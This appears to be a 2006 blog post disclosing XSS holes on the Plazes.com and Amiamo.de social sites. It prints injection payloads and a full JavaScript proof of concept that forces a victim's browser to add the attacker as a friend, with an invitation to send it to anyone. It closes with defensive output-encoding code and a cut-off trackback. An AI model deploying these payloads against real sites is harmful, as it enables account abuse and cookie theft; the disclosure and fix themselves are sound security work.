/usr/portage

The other side: Security 2.0 alpha 2

The talk at Webmontag is over. Now it's time to publish some security-related issues I found over the last weeks.

Plazes.com

Abstract
Plazes.com is a location-based service which displays and tracks your location. It provides some social functions, such as adding specified users as friends or creating a verbose personal profile.

Description
Detected three XSS injection holes on Plazes.com. The first was to inject code like <script>alert('test');</script> into any field in the user profile, which makes it possible to steal cookies or misuse the social functions on Plazes.com. It was possible to use this to inject JavaScript on the front page via the Photoblog field. Another, more or less uncritical hole was JavaScript injection in the search bar. Nevertheless, a critical issue is another quite elegant XSS variant: it is possible to inject a mouseover action into the profile by putting url.com" onmouseover="alert('I have fooled you');" in one of the URL fields of your personal profile. The injected value lands inside the href attribute, so the closing quote ends the attribute and the rest is parsed as a new event-handler attribute. It's possible to do the same things as with the first hole.

Security Level
Injection into profile: high
Injection via search bar: low

Status
Vendor was informed and two issues are fixed now.

Amiamo.de

Abstract
Amiamo.de is a Web 2.0 dating platform. It's possible to define preferences via tags and to contact users via an internal mail component. Things are mostly done with AJAX, which makes it more fun to exploit.

Description
Multiple serious XSS injections have been detected. It's possible to embed JavaScript into user mails and to add yourself as a friend automatically or – as a more common variant – to steal users' cookies. It is also possible to embed JavaScript in your user profile and automatically add yourself as a friend of the visitor. To tell a funny thing: tag fields also accept JavaScript, but tags are reviewed. If you inject JavaScript there, the vendor of Amiamo.de just filters your tag, but they don't fix it.

Status
Vendor was informed. Partially fixed. Proof of concept follows:

    <script>
    // Global request object, reused by the callback below.
    var http_request = false;

    // Send a form-encoded POST to a same-origin URL. Because the script runs
    // in the victim's page, the browser attaches the victim's session cookie.
    function makePOSTRequest(url, parameters) {
        http_request = false;
        if (window.XMLHttpRequest) {
            http_request = new XMLHttpRequest();
            if (http_request.overrideMimeType) {
                http_request.overrideMimeType("text/xml");
            }
        } else if (window.ActiveXObject) {
            // Legacy Internet Explorer fallbacks.
            try {
                http_request = new ActiveXObject("Msxml2.XMLHTTP");
            } catch (e) {
                try {
                    http_request = new ActiveXObject("Microsoft.XMLHTTP");
                } catch (e) {
                    return;
                }
            }
        }
        http_request.onreadystatechange = alertContents;
        http_request.open("POST", url, true);
        http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        http_request.setRequestHeader("Content-length", parameters.length);
        http_request.setRequestHeader("Connection", "close");
        http_request.send(parameters);
    }

    // Once the response is complete, replace the page with it.
    function alertContents() {
        if (http_request.readyState == 4) {
            if (http_request.status == 200) {
                var result = http_request.responseText;
                document.write(result);
            }
        }
    }

    // The friend-add endpoint accepts the request with no further check.
    makePOSTRequest("/friends.php", "newfriend=1&friend=USERNAME");
    </script>

Just replace USERNAME with your Amiamo.de-username and send it to whoever you want.
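Both findings (the Plazes.com URL-field attribute injection and the Amiamo.de profile and mail fields) come down to user input being written into HTML without context-aware encoding. The following is an added example, not code from either site: it escapes text-context fields, validates URL fields against an http(s)-only scheme whitelist before attribute-escaping them, and renders a constructed profile containing the payload shapes from the write-up. Field names (about, homepage) are assumed.

```javascript
// Added example (not from the original post or either vendor): contextual
// output encoding for profile fields. Field names are assumed.

// Escape for HTML text content and for double-quoted attribute values.
function escapeHtmlText(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Accept only absolute http(s) URLs. Anything that does not parse, or uses
// another scheme (javascript:, data:, ...), is rejected and returns null.
function safeHttpUrl(s) {
  let u;
  try { u = new URL(String(s)); } catch (e) { return null; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.href;
}

// Render a profile: free-text fields are text-escaped; the URL field is
// validated first and then attribute-escaped inside an always-quoted href.
// Even if a quote survived URL parsing it becomes &quot; and cannot close
// the attribute, so an onmouseover handler can no longer be smuggled in.
function renderProfile(profile) {
  const about = escapeHtmlText(profile.about);
  const url = safeHttpUrl(profile.homepage);
  const link = url === null
    ? "<span>(no valid homepage)</span>"
    : `<a href="${escapeHtmlText(url)}" rel="nofollow">${escapeHtmlText(url)}</a>`;
  return `<div class="profile"><p>${about}</p>${link}</div>`;
}

// Constructed sample input using the payload shapes from the write-up.
const SAMPLE_PROFILE = {
  about: "<script>alert('test');</script>",
  homepage: 'url.com" onmouseover="alert(\'I have fooled you\');"',
};
```

Cookie theft via the remaining text-context holes is additionally blunted by setting the session cookie with the HttpOnly flag, which this example does not cover.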


Trackbacks


  1. Trackback from WEBLOG (/usr/portage)
    posted on February 7th 2006, 07:42:50 am Webmontag Frankfurt

    »Already better« would be my verdict. After I had ranted quite a bit about the first Webmontag, I still could not resist going again. This time even with my own talk on security in Web 2.0. Angelegt klarzumachen, da
